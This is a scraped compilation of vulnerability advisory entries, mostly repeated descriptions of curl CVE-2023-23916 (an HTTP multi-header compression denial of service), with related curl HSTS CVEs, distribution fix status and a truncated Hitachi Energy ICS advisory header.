CVE-2023-23916: An allocation of resources without limits or throttling vulnerability exists in curl <v7.88.0 based on the "chained" HTTP compression algorithms, meaning that…

[HIGH] Hitachi Energy MSM ICS Advisory ## Hitachi Energy MSM Release DateMay 09, 2023 Alert CodeICSA-23-129-02 ## 1. EXECUTIVE SUMMARY - CVSS v3 9.8 - ATTENTION: Exploitable remotely/low attack complexity - Vendor: Hitachi Energy - Equipment: Modular Switchgear Monitoring (MSM) - Vulnerabilities: Improper Restriction of Excessive Authentication Attempts, Authentication Bypass by Capture-replay, Code Injection, Improper Restriction of Operations within the Bounds of a Memory Buffer, NULL Pointer Dereference, Insufficient Entropy ## 2. RISK EVALUATION Successful exploitation of these vulnerabilities could allow an attacker to obtain user access credentials of the MSM web interface or cause a denial-of-service condition. ## 3. TECHNICAL DETAILS ## 3.1 AFFECTED PRODUCTS The following

CVE-2023-23916 [MEDIUM] Oracle Oracle Communications Risk Matrix: Configuration (cURL) — CVE-2023-23916 Oracle Oracle Communications Risk Matrix: Configuration (cURL) vulnerability CVE: CVE-2023-23916 CVSS: 7.5 Protocol: HTTP Remote exploit: Yes Affected versions: Network Advisory: cpuapr2023 (APR 2023)

CVE-2023-23915 [CRITICAL] curl vulnerabilities Title: curl vulnerabilities Summary: Several security issues were fixed in curl. Harry Sintonen discovered that curl incorrectly handled HSTS support when multiple URLs are requested serially. A remote attacker could possibly use this issue to cause curl to use unencrypted connections. This issue only affected Ubuntu 22.04 LTS, and Ubuntu 22.10. (CVE-2023-23914) Harry Sintonen discovered that curl incorrectly handled HSTS support when multiple URLs are requested in parallel. A remote attacker could possibly use this issue to cause curl to use unencrypted connections. This issue only affected Ubuntu 22.04 LTS, and Ubuntu 22.10. (CVE-2023-23915) Patrick Monnerat discovered that curl incorrectly handled memory when processing requests with multi-header compression. A remote attacker could

CVE-2023-23916 [MEDIUM] CWE-770 curl: HTTP multi-header compression denial of service curl: HTTP multi-header compression denial of service An allocation of resources without limits or throttling vulnerability exists in curl <v7.88.0 based on the "chained" HTTP compression algorithms, meaning that a server response can be compressed multiple times and potentially with differentalgorithms. The number of acceptable "links" in this "decompression chain" wascapped, but the cap was implemented on a per-header basis allowing a maliciousserver to insert a virtually unlimited number of compression steps simply byusing many headers. The use of such a decompression chain could result in a "malloc bomb", making curl end up spending enormous amounts of allocated heap memory, or trying to and returning out of memory errors. A flaw was found in the Curl package. A malicious server can

CVE-2023-23916 [MEDIUM] CWE-770 An allocation of resources without limits or throttling vulnerability exists in curl <v7.88.0 based on the "chained" HTTP compression algorithms meaning that a server response can be compressed multip An allocation of resources without limits or throttling vulnerability exists in curl Is Azure Linux the only Microsoft product that includes this open-source library and is therefore potentially affected by this vulnerability? One of the main benefits to our customers who choose to use the Azure Linux distro is the commitment to keep it up to date with the most recent and most secure versions of the open source libraries with which the distro is composed. Microsoft is committed to transparency in this work which is why we began publishing CSAF/VEX in October 2025. See this blog post for more information. If impact to additional products is identified, we will update the CVE to reflect this. Mariner: Mariner hackerone: hackerone Customer Action Required: Yes Remediation: CBL-Mariner Rel

CVE-2023-23916 [MEDIUM] CVE-2023-23916: curl - An allocation of resources without limits or throttling vulnerability exists in ... An allocation of resources without limits or throttling vulnerability exists in curl <v7.88.0 based on the "chained" HTTP compression algorithms, meaning that a server response can be compressed multiple times and potentially with differentalgorithms. The number of acceptable "links" in this "decompression chain" wascapped, but the cap was implemented on a per-header basis allowing a maliciousserver to insert a virtually unlimited number of compression steps simply byusing many headers. The use of such a decompression chain could result in a "malloc bomb", making curl end up spending enormous amounts of allocated heap memory, or trying to and returning out of memory errors. Scope: local bookworm: resolved (fixed in 7.88.1-1) bullseye: resolved (fixed in 7.74.0-1.3+deb11u7) forky: resolved

CVE-2023-23914 [CRITICAL] curl vulnerabilities curl vulnerabilities Harry Sintonen discovered that curl incorrectly handled HSTS support when multiple URLs are requested serially. A remote attacker could possibly use this issue to cause curl to use unencrypted connections. This issue only affected Ubuntu 22.04 LTS, and Ubuntu 22.10. (CVE-2023-23914) Harry Sintonen discovered that curl incorrectly handled HSTS support when multiple URLs are requested in parallel. A remote attacker could possibly use this issue to cause curl to use unencrypted connections. This issue only affected Ubuntu 22.04 LTS, and Ubuntu 22.10. (CVE-2023-23915) Patrick Monnerat discovered that curl incorrectly handled memory when processing requests with multi-header compression. A remote attacker could possibly use this issue to cause curl to consume resources,

CVE-2023-23916 GHSA-v8vq-prc2-j6gx: An allocation of resources without limits or throttling vulnerability exists in curl <v7 An allocation of resources without limits or throttling vulnerability exists in curl <v7.88.0 based on the "chained" HTTP compression algorithms, meaning that a server response can be compressed multiple times and potentially with differentalgorithms. The number of acceptable "links" in this "decompression chain" wascapped, but the cap was implemented on a per-header basis allowing a maliciousserver to insert a virtually unlimited number of compression steps simply byusing many headers. The use of such a decompression chain could result in a "malloc bomb", making curl end up spending enormous amounts of allocated heap memory, or trying to and returning out of memory errors.

CVE-2023-23916 [MEDIUM] CVE-2023-23916: An allocation of resources without limits or throttling vulnerability exists in curl <v7 An allocation of resources without limits or throttling vulnerability exists in curl <v7.88.0 based on the "chained" HTTP compression algorithms, meaning that a server response can be compressed multiple times and potentially with differentalgorithms. The number of acceptable "links" in this "decompression chain" wascapped, but the cap was implemented on a per-header basis allowing a maliciousserver to insert a virtually unlimited number of compression steps simply byusing many headers. The use of such a decompression chain could result in a "malloc bomb", making curl end up spending enormous amounts of allocated heap memory, or trying to and returning out of memory errors.

CVE-2023-23916 [MEDIUM] HTTP multi-header compression denial of service HTTP multi-header compression denial of service A server can send an HTTP response with many occurrences of Transfer-Encoding and/or Content-Encoding headers. Each listed encoding allocates a buffer. The number of encodings listed within each header is already limited but the number of headers is not, allowing an HTTP response to consume all available memory. ## Impact Consumes all available memory, resulting in a DoS. CVE-2023-23916: HTTP multi-header compression denial of service Project curl Security Advisory, February 15th 2023 VULNERABILITY curl supports "chained" HTTP compression algorithms, meaning that a server response can be compressed multiple times and potentially with different algorithms. The number of acceptable "links" in this "decompression chain" was capped, but the

CVE-2023-23916 [MEDIUM] CVE-2023-23916: HTTP multi-header compression denial of service CVE-2023-23916: HTTP multi-header compression denial of service ## Summary: A server can send an HTTP response with many occurrences of Transfer-Encoding and/or Content-Encoding headers. Each listed encoding allocates a buffer. The number of encodings listed within each header is already bounded but the number of headers is not, allowing an HTTP response to consume all available memory. ## Steps To Reproduce: Using the curl test environment: 1. Extract test418 from the attached patch 2. runtests.pl 418 ## Supporting Material/References: Patch fixing the problem and new test for the case. ## Impact Denial of service.